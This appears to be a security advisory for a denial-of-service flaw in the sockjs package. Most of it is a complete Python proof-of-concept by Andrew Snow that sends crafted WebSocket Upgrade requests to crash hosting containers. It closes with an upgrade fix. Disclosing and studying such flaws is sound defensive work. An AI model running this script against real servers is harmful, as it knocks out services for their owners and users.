Denial of Service (DoS)org.webjars.npm:sockjs is a JavaScript library (for browsers) that provides a WebSocket-like object.
Affected versions of this package are vulnerable to Denial of Service (DoS). Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps.
PoC by Andrew Snow
import requests
import random
import argparse
def main():
print('SockJS 0.3.19 Denial of Service POC')
print('For educational purposes only')
print('Author: @andsnw')
print('------------')
parser = argparse.ArgumentParser(description='SockJS 0.3.19 Denial of Service POC')
parser.add_argument('--target', type=str, help='URL of target running vulnerable sockjs')
parsed = parser.parse_args()
target = vars(parsed)['target']
if target == None:
parser.print_help()
exit()
# Clean trailing /
if target.endswith('/'):
target = target[:-1]
print ("Initiating at: %s" % target)
# Create sockjs payload
payloads = [
('%s/sockjs/' % target),
('%s/sockjs/598/' % target),
('%s/sockjs/598/8ko8gkpf/' % target),
]
# Run 3 times with traversion
for url in payloads:
payload_url = "%s%s" % (url, random.randint(1000000000000000000,9999999999999999999))
print('Requesting: %s' % payload_url)
req = requests.get(url=payload_url, headers={
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Cache-Control': 'max-age=0',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'Upgrade',
'Upgrade': 'websocket',
})
print("Status code: %s" % req.status_code)
print ("Complete! Check if the container has crashed")
if __name__ == "__main__":
main()
How to fix Denial of Service (DoS)? Upgrade org.webjars.npm:sockjs to version 0.3.24 or higher.
| |
